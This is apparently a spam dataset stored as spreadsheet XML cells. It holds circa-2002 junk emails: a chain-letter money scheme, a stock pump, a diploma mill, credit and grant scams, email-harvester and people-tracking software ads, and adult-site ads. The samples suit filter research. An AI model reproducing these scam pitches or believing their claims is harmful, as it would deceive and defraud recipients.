          taken off this list and are still receiving this advertisement,  
          you may call us at 1-(888) 817-9902, or write to: Abuse Control Center, 
          7657 Winnetka Ave., Suite 245, Canoga Park, CA 91306Â 
Â </t>
  </si>
  <si>
    <t xml:space="preserve">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Take this entire letter, with the modified
list of names, and save it on your computer.
DO NOT MAKE ANY OTHER CHANGES.
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
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
Those 100 people mail out 5,000 e-mails each for
a total of 500,000 e-mails. The 0.2% response to
that is 1000 orders for Report # 3.
Those 1000 people send 5,000 e-mails each for a
total of 5 million e-mails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+ 3.....$5,000 + 4..... $50,000
+ 5.... $500,000 ....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cannot advertise until they receive
the report.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 1 from
Rui Sousa Santos
P.O. Box 132
Taylors Lakes VIC  3038
Australia 
______________________________________________________
REPORT # 2: "The Insider's Guide To Sending Bulk
Email On The Net"
Order Report # 2 from:
Richard Moulton
P.O. Box 82
Hot Springs,MT 59845
USA
______________________________________________________
REPORT # 3: "Secret To Multilevel Marketing On The Net"
Order Report # 3 from:
J.Siden
krondikesvdgen 54 A
83147 Vstersund
Sweden
______________________________________________________
REPORT # 4: "How To Become A Millionaire Using MLM &amp; The Net"
Order Report # 4 from:
Francis Kidd
P.O. Box 209
Homestead,PA 15120
USA
______________________________________________________
REPORT # 5: "How To Send Out One Million Emails For Free"
Order Report # 5 From:
J. Johns
P.O. Box 277806
Sacramento, CA 95827
USA
 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do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This message is not intended for residents in the
State of Washington, Virginia or California,
screening of addresses has been done to the best
of our technical ability.
This is a one time mailing and this list will
never be used again.To be removed from the mailing list  reply to
this message with "REMOVE ME" as the subject.
 </t>
  </si>
  <si>
    <t>Ev yapimi amatï¿½r videolar tqdkqjdnl 
Â 
Yeni Videolar Eklendi;
+560 adet video : 38 tanesi Ev 
        yapimi120 Adet HikayeKadinlarin Orgazm 
VideolariDevon ve Sylvia Saintin 
        Videolari,ï¿½nlï¿½ler5 Adet Adult Bouncer Sifre (2700GB 
        Film)Flash Porno Videolar,  Hersey 
burada
Â 
Â Filmlerin boyutlari kisa oldugundan hizli download
www.SeksLisesi.com</t>
  </si>
  <si>
    <t xml:space="preserve">
Ã¿FFFFA9 
      Copyright 2002 - All rights reservedIf you would no longer like us 
      to contact you or feel that you havereceived this email in error, 
      please click here to 
      unsubscribe.
Â rvacyp5et57mqkysfellajuu6zz9qyynqe5syfk5ew0rhqcyrd1qz80lheklem47idcz
</t>
  </si>
  <si>
    <t xml:space="preserve">Â Repair Your Credit Online!It's the Online Credit BreakthroughÂ you've been waiting for!In less than 5 minutes, directly from the comfort + convienience of your computer,yP5a9D3tsJ53xfOCWG6of1WjWsoNNKiGArhp91FSrRRbNKrTeyXhNoOQkOiRqs8qyfVkPFQGKNfyou could be repairing your credit!You can watch DAILY REAL TIME UPDATES, as you fix your problems Get the information you need quickly and efficently to remove the negative credit items from your report!Click Here For More InformationThank you - The Web Credit (tm) Team yP5a9D3tsJ53xfOCWG6of1WjWsoNNKiGArhp91FSrRRbNKrTeyXhNoOQkOiRqs8qyfVkPFQGKNf
</t>
  </si>
  <si>
    <t xml:space="preserve">
BAD MSG:PAM: -------------------- Start SpamAssassin results ----------------------
SPAM: This mail is probably spam.  The original message has been altered
SPAM: so you can recognise or block similar unwanted mail in future.
SPAM: See http://spamassassin.org/tag/ for more details.
SPAM: 
SPAM: Content analysis details:   (9.9 hits, 5 required)
SPAM: SEARCH_ENGINE_PROMO (2.6 points)  BODY: Discusses search engine listings
SPAM: HTML_50_70         (1.0 points)  BODY: Message is 50-70% HTML tags
SPAM: REALLY_UNSAFE_JAVASCRIPT (3.3 points)  BODY: Auto-executing JavaScript code
SPAM: SUPERLONG_LINE     (0.4 points)  BODY: Contains a line &gt;=199 characters long
SPAM: CTYPE_JUST_HTML    (1.7 points)  HTML-only mail, with no text version
SPAM: PRIORITY_NO_NAME   (1.0 points)  Message has priority setting, but no X-Mailer
SPAM: MSG_ID_ADDED_BY_MTA_3 (0.2 points)  'Message-Id' was added by a relay (3)
SPAM: AWL                (-0.3 points) AWL: Auto-whitelist adjustment
SPAM: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Â 
 Hello,                  I have visited www.taint.org and noticed that your website is not listed on some search engines.
                  I am sure that through our service the number of people who visit your website will definitely increase. SeekerCenter 
                  is a unique technology that instantly submits your website 
                  to over 500,000 search engines and directories  
                  -- a really low-cost and effective way to advertise your site. 
                  For more details please go to SeekerCenter.net.                  Give your website maximum exposure today!
                  Looking forward to hearing from you.
Best 
                  Regards,
                  Vanessa Lintner
                  Sales &amp; Marketing 
www.SeekerCenter.net
Â 
Â 
Â 
Â 
Â 
Â 
 </t>
  </si>
  <si>
    <t>Did you know thatÂ…Â…Â…???Fact:	Every electrical system suffers from power surges?Fact:	80% of electrical equipment damage is caused by surges - also known
as 'spikes'.  These spikes can damage sensitive electronics in computers
to heavy industrial motors.Fact:	These spikes or surges hit your electrical circuits up to 400,000
times per hour.  Your electrical equipment is being gradually and
sometimes suddenly destroyed.Fact:	OUR RANGE OF SURGE ARRESTORS will reduce your operating costs
dramatically by extending the life of all your electrical and electronic
equipment.Motors run cooler, your fluorescent lighting life is doubled.  Your
equipment works more efficiently and your energy costs fall.Fact:	THE SAVINGS you make in electrical consumption, electrical repairs,
electronic repair, telephone and data systems protection and lighting 
replacements can cover the cost of installing our surge and lightning
arrestors.Even more importantly no sudden, dramatic system failure caused by
	lightning, surges and spikes.Now you knowÂ…Â…Â…Â…!!Don't let your power supply kill your business!Email me for more information. I look forward to hearing from you.My very best to you.Ray Butler  
Email: apec-tech@totalise.co.ukP.S.	Don't underestimate the high level of risk and costs you're your
business is suffering from in replacement costs, down time and customer
dissatisfaction.APEC-TECH.COM
The Frieslawn Centre, Hodsoll Street, Sevenoaks, Kent. TN15 7 LH United
Kingdom
Tel UK: 01732 824401      Fax UK: 01732 824455 Email Office:  apec-tech@totalise.co.uk To be removed from our mailing list please reply with the word REMOVE in
the subject line and please accept our apologies for troubling you.</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</si>
  <si>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6414pQes2-008QthF8093ahxJ6-676cumj9620Ohcr3-405taCI6431voNa4-662XWln5l65</t>
  </si>
  <si>
    <t>=============================================================================================
THIS IS A FREE OFFER! 	THIS IS A FREE OFFER! 	THIS IS A FREE OFFER! 	THIS IS A FREE OFFER! 
=============================================================================================
Did you know that one of the biggest concerns of hundreds of millions of people is to maintain a youthful appearance?If you are interested in receiving a FREE SAMPLE of an amazing product that is guaranteed to deliver quick and dramatic results for people interested in looking 10-20 years younger, then please take advantage of our free offer.We so much believe in our product that we are willing to invest in the costs of letting you try them absolutely risk FREE!The reason for this is simple!  We know after years of testing our product, that you will be so amazed with the quick and dramatic results that you not only will order more, but you will share your results with others, thus making our investment in you very worth while.If you would like a FREE SAMPLE and also learn how you could try this product absolutely RISK FREE, then simply send a blank email with the words "SUBSCRIBE FOR FREE SAMPLE" in the subject area to:freesample1818@yahoo.comYour request will be processed with in 24 hours and you will be sent the requested 
information.Thank you for your interest,The "Look Younger Now" AssociatesONCE AGAIN:
=============================================================================================
THIS IS A FREE OFFER! 	THIS IS A FREE OFFER! 	THIS IS A FREE OFFER! 	THIS IS A FREE OFFER!
=============================================================================================</t>
  </si>
  <si>
    <t xml:space="preserve">Norton AD
Â 
      ATTENTION:
            This is a MUST for ALL Computer Users!!!
Â *NEW
      - Special Package Deal!*
Norton
            SystemWorks 2002 Software Suite
            -Professional Edition-
Includes
            Six - Yes 6! - Feature-Packed UtilitiesALL
            for 1
            Special LOW
            Price!
This Software Will:- Protect your
            computer from unwanted and  hazardous viruses- Help secure your
            private &amp; valuable information- Allow you to transfer files
            and send e-mails  safely- Backup your ALL your data quick and
            easily- Improve your PC's performance w/superior
            integral diagnostics!Â 
6
Feature-Packed Utilities
1
 Great
            Price             A $300+  Combined Retail Value
            YOURS for Only $29.99!
&lt;Includes
            FREE Shipping!&gt;
 Don't fall prey to destructive viruses
    or hackers!ProtectÂ  your computer and your valuable  information
    and-&gt;
            CLICK HERE to Order Yours NOW! &lt;-Click
      here for more information
Â Â Â Â Â Â Â 
      Your
      email address was obtained from an opt-in list. Opt-in MRSA List
      Â Purchase Code # 312-1-010.Â Â If you wish to be unsubscribed
      from this list, please 
CLICK HERE
</t>
  </si>
  <si>
    <t xml:space="preserve">
YOU HAVE NEVER SEEN A DILDO SITE LIKE THIS ONE!!
Extreme never seen before pictures and content
http://www.supremewebhosting-online.com/users/k/katrina/Join in the fun as the girls REAM in objects like never before
http://www.supremewebhosting-online.com/users/k/katrina/
This is NOT SPAM - You have received this e-mail because at one time or another you
entered the weekly draw at one of our portals or sites. We comply with all proposed and
current laws on commercial e-mail under (Bill s. 1618 TITLE III passed by the 105th Congress).
If you have received this e-mail in error, we apologize for the inconvenience and ask
that you remove yourself. Just go to http://200.38.128.154/hardships-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">creditfixThank You,Your email address was obtained from a purchased 
list, Reference # 1580-17600.Â Â If you wish to unsubscribe from this list, please 
Click here and enter your 
name into the remove box. If you have previously 
unsubscribed and are still receiving this message, you may email our 
Abuse Control Center, 
or call 1-888-763-2497, or write us at: NoSpam, 6484 Coral Way, 
Miami, FL, 33155".
Â© 2002 Web Credit Inc. All Rights Reserved.
</t>
  </si>
  <si>
    <t xml:space="preserve">Still believe you can earn $100,000 FAST IN MLM? GET REAL!GET EMM, A brand new SYSTEM that replaces MLM with something that WORKS! Start Earning 1,000's Now! Up to $10,000 per week doing simple online tasks.Free Info-  breakfree@luxmail.com - Type "Send EMM Info" in the subject box.This message is sent in compliance of the proposed bill SECTION 301. per section 301, Paragraph (a)(2)(C) of S.1618. Further transmission to you by the sender of this e-mail may be stopped at no cost to you by sending a reply to : "email address" with the word Remove in the subject line.  </t>
  </si>
  <si>
    <t xml:space="preserve">
Kates Knickers
Click Here Only If You Are Over 18 Years Old 
Click Here If you wish to be removed from future mailings 
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello:Are you satisfied with your ISP? Do you have 5 email addresses for you and your family? Do you have 5 MB of personal webspace? How truly unlimited is your access time?Our internet service provides you with all of that at a low monthly fee of just $14.95. You get 5 email addresses, 5MB of personal webspace and 350 hours of access time per month (virtually unlimited). That is more than most people will use, do the math.We have local numbers for many areas.
For further information please email me at codjig@canada.com and place "Request Information in the subject line. 
If you do not wish any more mailings please send a blank email to codjig@canada.com.
Regards,
Steve Murphy7977JrzS7-887RrsR4903rvQG5-779Sctl3539oIeJ0-966Grtz8l49
http://xent.com/mailman/listinfo/fork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</si>
  <si>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srgreen
http://xent.com/mailman/listinfo/fork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</si>
  <si>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go:http://www.lotsonet.com/opportunityand fill out our info form.  NO EXPERIENCE REQUIRED, WE WILL TRAIN YOU.
NO COMMITTMENT IS REQUIRED BY FILLING OUT THE FORM, IT IS FOR INFO
ONLY.http://www.lotsonet.com/opportunityYou want to be independent?  THEN MAKE IT HAPPEN!
HAPPEN!SIMPLY CLICK ON THE LINK BELOW FOR FREE, NO OBLIGATED INFORMATION!
GUARANTEED!http://www.lotsonet.com/opportunity
To be removed from our link simple go to:http://www.lotsonet.com/opportunity/remove.html
4227KypC4-306RFEI2068IzYK2-443dlUl6l33</t>
  </si>
  <si>
    <t xml:space="preserve">Dear andrea_justice ,100% Free Porn!
What more can you ask for?
CLICK HERE
Â 
Â 
Â 
REMOVAL INSTRUCTIONS: We strive to never send unsolicited mail.
However, if you'd rather not receive future e-mails from us,
CLICK HERE to send email and add the word REMOVE in the subject line.
Please allow 48 hours for processing. [9^":}H&amp;*TG0BK]
</t>
  </si>
  <si>
    <t xml:space="preserve">
Beautiful,Custom Websites for $359 Complete!
Beautiful, 100% Custom 
      Websites, $359 Complete!
Get a beautiful, 100% Custom Web Site (or 
                        yours redesigned)Â for only 
                        $359!*We have references coast to 
                        coastÂ and will give you plenty of sites to 
                        view!
Includes up to 
                  7 pages (you can add more), java rollover buttons, feedback 
                  forms, more. It will be constructed to your taste and 
                  specifications. We do not use templates,Â  our sites 
                  are completely custom.Â Â Â  *Must host with us @ 
                  $19.95/mo (100 Megs, 20 Email accounts, Control Panel, Front 
                  Page, Graphical Statistics, 
                  more).Â 
For sites to 
                  view, complete below or call our message center at 
                  321-726-2209 (24 hours). Your call will be returned 
                  promptly.NOTE:Â Â  If you are using a web 
                  based email program (such as Yahoo, Hotmail, etc.) the form 
                  below will not work.Â  Instead of using the 
                  form,Â  CLICK 
                  HERE .Â Â Â  Name: Phone 
                  w/AC*:State: Type Project: New Site:Redesign Flash Intro/bannerÂ Â  Current 
                  site?:Comments:Â Â If you do not wish to 
            receive our messages, CLICK 
            HERE Â  (Please enter 
            ALL email addresses (in the body of the message) you wish to have 
            eliminated from future 
        mailings.[8734IcUm5-941FzRj1099DvNh4-450ZrLD0601Vnia4-052sMEW9113qIaU3-562mEwQ9923iBvN2-17@75]
</t>
  </si>
  <si>
    <t xml:space="preserve">=============================================
Brand-New VERSION 7.0 Just Released:
Astounding New Software Lets You Find
Out Almost ANYTHING about ANYONE...
=============================================Download it right now (no charge card needed):For the brand-new VERSION 7.0, click here:
http://WWW.BIZH0ST0NE.NET/freeht/mxi.html Discover EVERYTHING you ever wanted to know about:your friends
your family
your enemies
your employees
yourself - Is Someone Using Your Identity?
even your boss!DID YOU KNOW you can search for ANYONE, ANYTIME,
ANYWHERE, right on the Internet?Download this software right now--click here:
http://WWW.BIZH0ST0NE.NET/freeht/mxi.html This mammoth COLLECTION of internet investigative
tools &amp; research sites will provide you with NEARLY
400 GIGANTIC SEARCH RESOURCES to locate information on:* people you trust
* screen new tenants or roommates
* housekeepers
* current or past employment
* people you work with
* license plate number with name and address
* unlisted phone numbers
* long lost friends
Locate e-mails, phone numbers, or addresses:o Get a Copy of Your FBI file.o Get a Copy of Your Military file.o FIND DEBTORS and locate HIDDEN ASSETS.o Check CRIMINAL Drug and driving RECORDS.o Lookup someone's EMPLOYMENT history.
For the brand-new VERSION 7.0, click here:
http://WWW.BIZH0ST0NE.NET/freeht/mxi.html 
Locate old classmates, missing family
member, or a LONG LOST LOVE:- Do Background Checks on EMPLOYEES before you
  hire them.- Investigate your family history, birth, death
  and government records!- Discover how UNLISTED phone numbers are located.- Check out your new or old LOVE INTEREST.- Verify your own CREDIT REPORTS so you can
  correct WRONG information.- Track anyone's Internet ACTIVITY; see the sites
  they visit, and what they are typing.- Explore SECRET WEB SITES that conventional
  search engines have never found.For the brand-new VERSION 7.0, click here:
http://WWW.BIZH0ST0NE.NET/freeht/mxi.html 
==&gt; Discover little-known ways to make UNTRACEABLE
    PHONE CALLS.==&gt; Check ADOPTION records; locate MISSING CHILDREN
    or relatives.==&gt; Dig up information on your FRIENDS, NEIGHBORS,
    or BOSS!==&gt; Discover EMPLOYMENT opportunities from AROUND
    THE WORLD!==&gt; Locate transcripts and COURT ORDERS from all
    50 states.==&gt; CLOAK your EMAIL so your true address can't
    be discovered.==&gt; Find out how much ALIMONY your neighbor is paying.==&gt; Discover how to check your phones for WIRETAPS.==&gt; Or check yourself out, and you will be shocked at
    what you find!!These are only a few things you can do, There
is no limit to the power of this software!!To download this software, and have it in less
than 5 minutes click on the url below to visit
our website (NEW: No charge card needed!)
http://WWW.BIZH0ST0NE.NET/freeht/mxi.html 
If you no longer wish to hear about future
offers from us, send us a message with STOP
in the subject line, by clicking here:
mailto:remv0615b@bk.ru?subject=STOP_MX727 Please allow up to 72 hours to take effect.Please do not include any correspondence in your
message to this automatic stop robot--it will
not be read. All requests processed automatically. [FRYTE^3247(^(PO1:KJ)_8J7BJK9^"]
</t>
  </si>
  <si>
    <t xml:space="preserve">
Â 
Â If you thought that in order to be a Mortgate Loan Officer, you had to Graduate from College, be Certified, Licensed or Bonded. . . Think Again!
Â 
Â This message is coming to you as a result of an Opt-in Relationship our Clients have had with you. If you simply wish to be Removed from all future Messages, 
then CLICK 
HERE [^(PO1:KJ)_8J7BJK9^":}H&amp;*TG0BK5NKIYs5]</t>
  </si>
  <si>
    <t>A:link {TEX-DECORATION: none}A:active {TEXT-DECORATION: none}A:visited {TEXT-DECORATION: none}A:hover {COLOR: #0033ff; TEXT-DECORATION: underline}
OTCÂ Newsletter
Discover Tomorrow's WinnersÂ For Immediate ReleaseCal-Bay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TODAY.REASONS TO INVEST IN CBYIA profitable company and is on track to beat ALL earnings estimates!One of the FASTEST growing distributors in environmental &amp; safety equipment instruments.Excellent management team, several EXCLUSIVE contracts.  IMPRESSIVE client list including the U.S. Air Force, Anheuser-Busch, Chevron Refining and Mitsubishi Heavy Industries, GE-Energy &amp; Environmental Research.RAPIDLY GROWING INDUSTRY
Industry revenues exceed $900 million, estimates indicate that there could be as much as $25 billion from "smell technology" by the end of 2003.!!!!!CONGRATULATIONS!!!!!Our last recommendation to buy ORBT at $1.29 rallied and is holding steady at $3.50! Congratulations to all our subscribers that took advantage of this recommendation.ALL removes HONORED. Please allow 7 days to be removed and send ALL addresses to:GoneForGood@btamail.net.cn
Â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â‰¡OTC
â‰¡*********</t>
  </si>
  <si>
    <t xml:space="preserve">Tomorrow will be huge.  Password: Soleil has become the premiere Thursday night in New York - with a chill after-work and a blazing late-night.  This Thursday, producers from Columbia Tristar are casting people for their new reality TV show.  We invite all members of the media and entertainment industries for an exclusive event celebrating New York high-life.Password: SOLEIL
Thursdays @Nativa
5 East 19th Street
b/w B'way &amp; 5th Ave.
New York, NY
"SOLEIL" REQUIRED FOR ENTRY
You must say 'Soleil' at the door.
$5 before 10pm
6-8pm Happy Hour
Free dinner buffet.
1/2 price drinks.
party 'til 4am
Music: Hip-Hop, Reggae, Latin Soul, R&amp;B
RSVP Recommended:
212.591.1253
password@thesoleilgroup.com----------------
To be removed from this list, email: remove@thesoleilgroup.com with the word "remove" in the subject heading. 
----------------
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Digital Publishing Tools - Free Software Alert!
Publish Like a Professional with Digital Page 
AuthorEasily Create Professional:
eBooks
eBrochures
eCatalogs
Resumes
Newsletters
Presentations
Magazines
Photo Albums
Invitations
Much, much moreSave MONEY! - Save TreesSave on Printing, Postage and Advertising CostsDIGITAL PAGE AUTHOR
DOWNLOAD NEW FREE Version NOW!
*Limited Time Offer
Choose from the following Display 
Styles:
3D Page Turn
Slide Show
Sweep/Wipe
Embed hyperlinks and Link to anywhere Online, 
such as your Website, Order Page or Contact Form.
Distribute via Floppy, CD-ROM, E-Mail or Online.Take your Marketing to the Next Level!For More Info, Samples or a FREE Download, click the appropriate link to the right! Â 
Server demand is extremely high for this limited time Free Software offer. Â 
Please try these links periodically if a site seems slow or unreachable.
WEBSITE 1
WEBSITE 2
WEBSITE 3If you wish to be removed from our mailing list, please cick the Unsubscribe button
 Â 
Copyright Â© 2002 - Affiliate ID #1269
*FREE Version is FULLY FUNCTIONAL with NO EXPIRATION and has a 4 page (2 page spread) limit.
</t>
  </si>
  <si>
    <t xml:space="preserve">
Â Â 
Dear 
                        Homeowner,
Â 
*6.25% 30 Yr Fixed Rate 
                        Mortgage
Interest 
                        rates are at their lowest point in 40 years! We help you 
                        find the best rate for your situation by matching your 
                        needs with hundreds of lenders! Home Improvement, 
                        Refinance, Second Mortgage, Home Equity 
                        Loans, and More! Even with less than perfect credit! 
                        Click Here for a Free 
                        Quote! 
Lock In YOUR LOW FIXED RATE TODAYaNO COST 
                          OUT OF POCKET
aNO 
                          OBLIGATION
aFREE 
                          CONSULTATION
aALL 
                          CREDIT GRADES ACCEPTED 
Rates as 
                        low as 6.25% won't stay this low forever CLICK 
                        HERE
Â 
* based on 
                        mortgage rate as of 5-15-02 as low as 6.25% see lender 
                        for detailsÂ HApply now and one of our lending partners 
                              will get back to you within 48 
                              hours.CLICK 
                            HERE!
remove http://www.cs220.com/mortgage/remove.html
1474322</t>
  </si>
  <si>
    <t>Obtain a prosperous future, money earning power,
and the admiration of all.Degrees from Prestigious Accredited
Universities based on your present knowledge
and life experience.CALL NOW to receive your diploma
within days!!!
 1  425  790  3463No required tests, classes, books, or interviews.Bachelors, masters, MBA, and doctorate (PhD)
diplomas available in the field of your choice.No one is turned down.Confidentiality assured.CALL NOW to receive your diploma
within days!!!
 1  425  790  3463
  Call 24 hours a day, 7 days a week, including
Sundays and holidays.
231175433222211111111</t>
  </si>
  <si>
    <t xml:space="preserve">Dear jm-cv ,
Â Â Â Â Â Â Â Â Â Â  Want   
      To Harvest A Lot Of EmailÂ Â  Addresses In A Very Short Time?
Easy Email   
      SearcherÂ  isÂ    
      aÂ  powerfulÂ  EmailÂ  softwareÂ Â  thatÂ    
      harvests general Email lists from mail serversÂ Â  Easy Email Searcher can get 100,000 Email addresses directly from the Email   
      servers in only one hour!Â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abilityÂ  to reconnect to the mail   
        server if the server has disconnected and continue the searching at the   
        point where it has been interrupted.
Easy Email   
        Searcher has an ergonomic interface that is easy to set up   
        and simple to use. 
ï¿½ï¿½Easy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-------Â  Now,Â  The full version of Easy Email 
      Searcher only costs $ 
      39. 95
Click The Following Link To   
      Download The Demo :
Download Site   
      1
Download Site   
      2Â Â Â Â Â Â Â Â Â Â Â  ï¿½ï¿½IfÂ  you can not download this program ,Â  please   
      copy the following link into your URL , and then click " Enter" on your   
      Computer Keyboard.
Here is the   
      download links:http://www.wldinfo.com/download/email/newees.zip
http://bestsoft.3322.org/onlinedown/newees.zip
Disclaimer:We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.Â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
  </si>
  <si>
    <t xml:space="preserve">SUMMARY:Everything you need to know about every registered US Business is on one single CD-ROM. The latest version of the USA Business Search CD contains a wealth of information on 18 million business listings in the US. So whether you're after new business, building or enhancing your own database or simply want cheap quality leads, USA Business Search CD will pinpoint exactly what you are looking for.USA Business Search is an easy to use CD-ROM compiled using the most accurate and comprehensive USA Yellow Pages (11.6 million records) and USA Domain Names (6.2 million records) databases. At just $429.00, USA Business Search CD is a cost effective way of generating UNLIMITED leads and spotting opportunities. Unrestricted export capability enables you to import data into your database application. Where else can you get this for $429.00? For the same data InfoUSA will charge you over $600,000.00WHAT IS USA BUSINESS SEARCH CD?USA Business Search CD gives you unlimited access to search, filter, extract, and import data by the following fields:1. USA Businesses/Yellow Pages database:
Category, SIC Codes/Description, Company Name, Street, City, State, Zip, Phone Number.2. USA Domain Names database:
Domain Name, Company Name, Registrant Name, Registrant Email, Registrant Address, Registrant Phone, Registrant Fax.- Over 18 million listings with phone numbers
- Over 6.7 million contact names with email addresses
- Over 3 million listings with fax numbersAvailable also complete listings of Canadian, European and Latin American Businesses. Please reply back with the Subject: MORE INFO.HOW DOES USA BUSINESS SEARCH WORK?Once you purchase USA Business Search CD for $429.00, all data on the CD-ROM can be viewed, printed, exported without any limitations. A built-in Search Engine lets you export information to create new prospect spreadsheets and databases or enhance your current ones.WHY USA BUSINESS SEARCH?USA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Quickly identify target markets and customers using a variety of criteria
- Produce cost-effective direct mailing lists instantly
- Print directly onto labels that can be addressed to key named contacts
- Create telemarketing campaigns
- Avoid costly calls to Service Bureaus, simply view the telephone number
- Clean and enhance your own spreadsheets and databases
- Find new, more cost-effective suppliers
HOW TO PLACE THE ORDER?We are accepting credit card or check orders. Call us to place the order, or complete the form below, print and fax the form, or mail it to the address below.ORDER LINE: 1-786-258-2394VIA FAX: 1-305-947-0045OR MAIL TO:
DataNetwork
16950 North Bay Road, Suite 801
Miami Beach Beach, FL 33160. USA* * * Please copy and paste form order, fill out, print, sign, and mail or fax to us.Please Send Me "US BUSINESSES &amp; US DOMAINS CD" for $429.00 (US) plus s/h.*Name:
*Company Name:
*Shipping Address:
*City:
*State/Province:
*Postal Code:
*Country:
*Telephone:
*Fax:
*E-mail Address:Card Type: MasterCard [ ] Visa [ ] AmEx [ ] Discover [ ]*Credit Card Number:
*Expiration Date:*Shipping/Handling: $Free - in the USA, $25.00 - Overnight [ ]; Overseas []; C.O.D. [ ].*TOTAL ORDER: $*I authorize "0-0 DataNetwork" to charge my credit card for 'US BUSINESSES &amp; US DOMAINS CD' in the amount of $__________ .*Date:                                                   *Signature:
*Name as appears on Card:
*Billing Address:
*City, State &amp; Postal Code:=========================================================
We apologize if this message was intrusive.
We guarantee you will never again hear from us.
Just click here to be removed REMOVE or reply back with Subject REMOVE.
Thank You.
* * *
</t>
  </si>
  <si>
    <t>When America's top companies compete for your business, you win.http://quotes.routeit21.com/sure_quote/Take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http://quotes.routeit21.com/sure_quote/
"...was able to get 3 great offers in
less than 24 hours." -Jennifer C"Met all my needs... being able to search
for loans in a way that puts me in control." -Robert T."..it was easy, effortless...!"-Susan A. Click here to delete your address from future updates.
http://quotes.routeit21.com/sure_quote/rm/</t>
  </si>
  <si>
    <t xml:space="preserve">
Â 
Free Personal and Business Grants
Â " Qualify for at least $25,000 in free
grants money - Guaranteed! "Each day over One Million Dollars in Free
Government
GrantsÂ  is given away to people just like you for a wide
variety of Business And Personal Needs
Â Â Â Â Â Â Â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Â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Â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for an immediate refund of your purchase price. You simply can't lose.
Free
Bonuses
Just to "sweeten" the deal,
I'll include the following four valuable bonuses,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aÂ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Simple,
easy to copy ideas that will enhance your image - and the response you
get from your customers.
Common
problems in starting and managing a home basedÂ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!!!Â 
P.S. The Complete Guide To Government
Grants will make a huge difference. You risk nothing. The guide is not
the original price of $50, but only $19.99 (if you purchase through
this sale ) and comes with a one year money back guarantee. And you
get four valuable free bonuses which you may keep regardless. Don't delay
a moment longer, ORDER NOW !!!!
Â Shipping
and Handling is FREE since we will
email you all of this info via access to our secure website which contains
everything described above.Â Order
Now!!!
Â 
1051Ul5
</t>
  </si>
  <si>
    <t xml:space="preserve">GET HIGH...LEGALLY!
IT REALLY WORKS!
	  PASSES ALL DRUG TESTS!
	  EXTREMELY POTENT!
CLICK HERE for more info on Salvia DivinorumCLICK HERE for SALVIA 5X EXTRACT! WARNING...VERY POTENT!CLICK HERE for SALVIA 13X. The most POTENT, LEGAL, SMOKABLE herb on the planet! 13 times the power of Salvia Divinorum!WARNING...EXTREMELY POTENT!Disclaimer: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	  
 </t>
  </si>
  <si>
    <t xml:space="preserve">Tremendous Savings
on Toners,Â Inkjets, FAX, and Thermal Replenishables!!
Toners 2 Go
is your secret
weapon to lowering your cost for High Quality,
Low-Cost printer
supplies!Â  We have been in the printer
replenishables business since 1992,
and pride ourselves on rapid response and outstanding
customer service.Â 
What we sell are 100% compatible replacements for
Epson, Canon, Hewlett Packard,
Xerox, Okidata, Brother, and Lexmark; products that
meet and often exceed
original manufacturer's specifications.
Check out these
prices!
Â Â  Â Â Â Â  Epson Stylus
Color inkjet cartridge
(SO20108):Â Â Â Â  Epson's Price:
$27.99Â  Â Â 
Toners2Go price: $9.95!
Â Â  Â Â Â  HP
LaserJet 4 Toner Cartridge
(92298A):Â Â Â Â Â Â Â Â Â Â Â 
HP's
Price:
$88.99Â Â Â Â Â Â Â Â Â Â Â 
Toners2Go
  price: $41.75!
Â 
Come visit us on the web to check out our hundreds
of similar bargains at Toners
2 Go!
  request to be removed by clicking HERE
mtarrant
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Homeowner, Interest Rates are at their lowest point in 40 years! We help you find the 
best rate for your situation by matching your needs with hundreds of 
lenders!Home Improvement, Refinance, Second Mortgage, 
Home Equity Loans, and much, much more!
You're eligible even with less than perfect credit!
This service is 100% FREE to home owners and new home buyers 
without any obligation. Where others say NO, we say YES!!!http://www282.fastwebsnet.com/mtg
Take just 2 minutes to complete the following form.
There is no obligation, all information is kept strictly
confidential, and you must be at least 18 years of age.  
Service is available within the United States only.
This service is fast and free. http://www282.fastwebsnet.com/mtg
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++To opt out:http://www282.fastwebsnet.com/optout.html
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear lanigel ,100% FREE ADULT HARDCORE!
Â CLICK HERE
Â 
Â 
Â 
Â 
Â 
Â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[NKIYs5]
</t>
  </si>
  <si>
    <t>Lowest rates available for term life insurance! Take a moment and fill out our online form to see the low rate you qualify for. Save up to 70% from regular rates! Smokers accepted! http://www.takemetothesavings.com/termlife/ 
 Representing quality nationwide carriers. Act now!
 ---------------------------------------
 To unsubscribe, go to: 
 http://www.takemetothesavings.com/stopthemailplease/
 Please allow 48-72 hours for removal.</t>
  </si>
  <si>
    <t xml:space="preserve">Ricardo
Â Â Â 
OlÃ¡
Â Â Â  Trabalho
divulgando empresas sÃ©rias e competentes
que podem lhe oferecer
excelentes oportunidades.
Â Â Â  Caso
nÃ£o seja de seu interesse solicito que exclua
este e-mail ou se possÃ­vel
o repasse para seus amigos.
Â Â Â  Muito
obrigado pela ajuda e compreensÃ£o
Â Â Â  Atenciosamente...
Â Â Â  Ricardo
L. Kampf.Proteja
seu patrimÃ´nio sem gastar uma fortunaCamera Falsa M01R$ 36,00
frete inclusoPara
ver outros modelos ou obter mais
detalhes
clique aqui.Outros
produtos
Escuta
telefÃ´nicaAlarmesCameras
verdadeirasTrava de CÃ¢mbioR$ 38,00
Frete inclusoAo
mesmo tempo trava a alavanca
do
cÃ¢mbio e do freio de mÃ£o.Â 
Fabricada
em aÃ§o carbono e ferro,
pintura
eletrostÃ¡tica.
Fechadura
Tetra
Para
ver outros modelos ou obter mais
detalhes
clique aqui e visite nossa loja.
Â 
Â Â Â  Para se retirar do cadastro, favor responder sem assunto.
Â 
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
______________________________________________________________________
______________________________________________________________________FILL OUT OUR SHORT APPLICATION FOR AN UNBELIEVABLE 4.1% MORTGAGE (APR)  () HOME REFINANCING
  () HOME IMPROVEMENT
  () DEBT-CONSOLIDATION
  () CASH-OUTPlease Click HERE 
for our short application. The following are NO problem and will not stop you from getting the 
financing you need:
  *** Can't show income
  *** Self-Employed
  *** Credit Problems
  *** Recent Bankruptcy
